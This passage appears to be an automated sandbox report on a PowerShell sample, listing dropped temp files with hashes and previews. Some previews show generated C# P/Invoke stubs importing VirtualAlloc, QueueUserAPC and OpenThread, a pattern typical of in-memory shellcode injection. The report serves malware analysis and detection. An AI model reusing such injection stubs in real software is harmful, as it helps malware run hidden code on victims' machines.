                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ps3slfo1.dmj.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sopdgebh.ooj.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjdcwq0i.u43.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulyjupso.1ye.ps1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvtk34pq.xbg.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yelyat4t.ngd.psm1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:unknown
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.0959304654205595
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytiak7Ynqq0jPN5Dlq5J:+RI+ycuZhNKakSSPNnqX
                  MD5:F2B419733048427E659D49453C92AEC6
                  SHA1:E8D1E4AB769EE0FDB703C7EBCBD907A59DAF012A
                  SHA-256:884CA4ECD737071D2660C02E80625E10D698560A51BAA482CBFAF0CC2E56111C
                  SHA-512:5610F3E33FEA8C39723A00CA9C6A8054387B33978FE99C1304C686ED97C092D9294E9B20C4C5F8A81419C82C21C68629BFD8FC69F1D09E32EBE5C844943D75C6
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw binary resource bytes omitted)
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.212350408166197
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fr0E10zxs7+AEszIWXp+N23fr0EP:p37Lvkmb6KHjtqWZE8jtP
                  MD5:B57390EFD9A17D0667B42DAE130BAD7B
                  SHA1:914464276843620AF2EE7F79FAC4F9183CEC863A
                  SHA-256:B61ABF43F029CE13A9CE70299C0E8DFC7B4F05DB537DBE6776C6DA3173F1EC3E
                  SHA-512:79E08B16F66B426A86412172127C2B74EE4C2F7A79B5A82A7485F2D363CEE8DD2B1C62C7C5E11EB1BBAD4E1218DA7380A3C53CAE2958B7A03CB9C6184E836A84
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.0.cs"
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6011498201789007
                  Encrypted:false
                  SSDEEP:24:etGSt/W2dg85xsF2uhyjidWJHiXE4tkZf2B7+WI+ycuZhNKakSSPNnq:6gkb5xs0cWQXEvJ2dl1ulKa3+q
                  MD5:A48B3CC2357B538B3E2841EABC8B83AB
                  SHA1:9004FC5DD88300F1EEB548EC17E832C954622DC5
                  SHA-256:E49DFBEB8E362C8D62A44442104B37CEA5219872711E76C1D165A218C4182B9F
                  SHA-512:7F3A70FEE41B4D3F3CD07E746A09EDD33BCE55624967BAC716697DC425D9BF3B95CD683EA3CA28118C61112876F35C286D33C725E40FB1D2A4FE023A902F2916
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw PE binary bytes omitted)
                  C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.316649243457035
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHRE8IKaM5DqBVKVrdFAMBJTH:Ukka6ARE8IKxDcVKdBJj
                  MD5:00743D41B51FEF388D39F06B92DB3E6E
                  SHA1:6BE45F778056018D1D0E9C15977B00FB07DA52A3
                  SHA-256:8AC0D49823018E4746E7FD3EC3460213498D42FD728196CA3091A27A4F8CF650
                  SHA-512:198DA3B292A4609E69084767F2745B734E1ED7EA2721316ECF622B1C31F4A0341E0A389A21412B03D105C91661DA7C0CA6FDAA9D10A11FB96C2CDE15576A339B
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.113459562599666
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNak7YnqqBPN5Dlq5J:+RI+ycuZhNPakSBPNnqX
                  MD5:44CA36F38C4EC884B315332E829C76EB
                  SHA1:62EC19DE194D662A05E3AE75FE92938C648AE8D3
                  SHA-256:8A522BD8F647557BA34BAC575E91FBB6BE520C8C7565F2A23892F218A2D0FAF0
                  SHA-512:4CB71671A89E93E3AACC0637EB256E94A21ECEF4E72A31B54D2D586F798A24965358277C719716B8789665ECD565EF3860E718D25F6F049B178B78A7C18C1704
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw binary resource bytes omitted)
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.289174393999176
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fRWOazxs7+AEszIWXp+N23fRWOUAn:p37Lvkmb6KHJWOaWZE8JWOUA
                  MD5:25E68EBCF8ABE19D522B9F7CF80D66DD
                  SHA1:BBAD341F9942D8416C658DEA757326B22A2353E1
                  SHA-256:0BB6C4EF56D5EB208979C24B6CDA400F499A96CA55C2A0447E0708AC9DEFA18E
                  SHA-512:D2B215787BB43BB007938016C3207BFAC0DC57CABA4A53AA61FF9939094E75FB4338186DF4E1C08A1561EEC2E9568909995109248221406B173A150335D0AC29
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.0.cs"
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6159985439500653
                  Encrypted:false
                  SSDEEP:24:etGSV8OmU0t3lm85z7ntQW6gfgnG4laUtkZfTB5kVUWI+ycuZhNPakSBPNnq:6bXQ3r5uDarJTM31ulPa3zq
                  MD5:804B237C83038B30513C9C255C653BEC
                  SHA1:9A6923E88746B58B8E32974B9A227398D1DC6700
                  SHA-256:AB81E8646B4E6F5EBB2D5A34AC7719565568E0A9D2AB8DFAA4EBEF5B42F7EA28
                  SHA-512:0F5F5D4B3BB3B48EBD06317CFE16BE7E587A29507224A97ED6021AE0813BB123737C35D087C3D7617F0817E2B2E1063287FAF0745CA44E9256D02D48F7241CAA
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw PE binary bytes omitted)
                  C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.334556517758157
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHIO7E8IOmKaM5DqBVKVrdFAMBJTH:Ukka6AnE8qKxDcVKdBJj
                  MD5:814C825E0BE39172F802F03601650CC1
                  SHA1:97115EEDA96D164B2639262EEFEB1CF59582283E
                  SHA-256:2E20688AAE2CB582B169817FFF902F077232AE2BBC6586513738D3883040F536
                  SHA-512:A8E015FC4D23AE2187DBD6F62EF3798DA31A44652ADC59638BA4AC5E745FEF0A5BD916747F89E5C1917FFBCFE8818D2B7FE7405B5B6DDFE3EFB949673A64C4AA
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.0888774581437173
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygqlGak7Ynqq7qlXPN5Dlq5J:+RI+ycuZhNKqYakS7qNPNnqX
                  MD5:E30068629991486BEBAD00E41588FE4E
                  SHA1:C50A0802C62B9F012585B0961E76CEC88C4E420F
                  SHA-256:76B62C96DDA2B373007D007B1828C32730780BB1AA65CE4488A58F7266FE11A8
                  SHA-512:A5C41F85DB2E619696C94D96B6DA5F9D8ECD2B8D55F65127CA1876BDD28E9579A877A8DB88319ADE8A23B56D9E8C7AF0C8DC3F31C6D5114D37630122D1191233
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw binary resource bytes omitted)
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.256015749761079
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fT8Nzxs7+AEszIWXp+N23fT8on:p37Lvkmb6KH4WZE81n
                  MD5:BB998B048515845A9D1E61C40342B88F
                  SHA1:A74E0B7628404AB735767F9DF0F27378EF547E57
                  SHA-256:F0740A2E540BD7CCB2BB711116F86EA9964878255E7D0283BF16DE9D2568B733
                  SHA-512:B7AC73A35C2FB369025F484C06B87D3CAE601E2B9BE4B680BE204105678673DFB5F8DA2FB6AB14D273DA5D702214D0F220263A3A150465FBF58C77A5FD2C97BF
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.0.cs"
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.6172047281029736
                  Encrypted:false
                  SSDEEP:24:etGSU8OmU0t3lm85z7ntQW6gfg1gG4laUtkZfLXOBX3VUWI+ycuZhNKqYakS7qN8:6uXQ3r5u2arJjOxF31ulKxa37Kq
                  MD5:FB76CE97EC044EE6640693192CC1C1DC
                  SHA1:F525422E8BEA37B3711F127DDA5A8C98B961E00A
                  SHA-256:50F13EC370D385AEE109024AAC6F2ABC1288C147BC94B318C02571D9C1D136E0
                  SHA-512:CCA27850FA596CFDDCE9148AC699C0A85A3282DE79B650525BF25784687CECD810663C8BB8315A3C2F58B1B54D2A040E405B6C7561839EBC29747ABD32BD4C1C
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw PE binary bytes omitted)
                  C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.311260397013452
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHJE81uKaM5DqBVKVrdFAMBJTH:Ukka6AJE81uKxDcVKdBJj
                  MD5:A27D6300BC7C1BD10919A1A9CDB9E244
                  SHA1:6F69FB52FFFFC162E7ACFDE725AF0B10CCA83980
                  SHA-256:A507F9D99054E884FEED0F0158F4E429BA332C472E2470BA04C25C4DB1B0922C
                  SHA-512:756323EB66DC8E17570F60EB846CD9363FB59B2DD613B6951B97923B5D96E90BCAD48D225BF62CE1ABD4D7AD34049D24E2F2160823865E8A0BF6CA810AC7E8A7
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\CSC601F2F65325C4ADC8E494E5EE1FB1173.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6iGak7YnqqXiXPN5Dlq5J:+RI+ycuZhNSakSKPNnqX
                  MD5:BFE65E353F3068EB1815ECFFAA610E16
                  SHA1:BB3EA43F19FEBA29BB364F455959D3136200C297
                  SHA-256:F82D3D6026B9F7AB7FC37269244717B003B408A2010ABA5D7AF266C07EDC4B2D
                  SHA-512:58D35B356AA8972C150F5244FB68417ADFED6E500ADCD980855F6AA8897E3108856DF33D21E76BFD85AB3D8B14701628B523A0748E112A329068B023AEB4FE40
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw binary resource bytes omitted)
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.245729470602234
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f8pUSzxs7+AEszIWXp+N23f8pUX:p37Lvkmb6KH0LWZE80m
                  MD5:886FA0662E66DAEB013CC4F2A828676D
                  SHA1:D3985A2F3A1B997065D3DD113B0CB2D137F6C6F5
                  SHA-256:F59EF10434E610F5A71E0D70A5B6857A0F2A96765907B9FEF71FECFB81C2EF30
                  SHA-512:9D289919442596D7E1BAAAF88CC68981431423FE7826023D8A0A5468A20DDA04E09571D931FB25DD64CADB42BC170A181952749568822A3BE79B531D7EF0F9BF
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.0.cs"
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:24:etGSf/W2dg85xsF2uhyjEdWJHiXE4tkZfQBC3+WI+ycuZhNSakSKPNnq:6Wkb5xs0WWQXEvJQk3l1ulSa3mq
                  MD5:E591D86B7166B06E68E3D6CBA6F29066
                  SHA1:651E2287C8D762B5979A509820C1B84F8C770467
                  SHA-256:F1566B1CE05582D8F0E49FD2FB54B8A6E6744F84C5D4712EAF8DB1B749B29FA2
                  SHA-512:80CE1D11483ED65267E6116D6B13BB90E834B52E1493515C89E6F25E557932F90DFC886B787B603AC0C0DF8B0CE9EBA9AAE73ADC38C6BF01FEBF25726D92005B
                  Malicious:false
                  Reputation:unknown
                  Preview: (raw PE binary bytes omitted)
                  C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.329605194560862
                  Encrypted:false
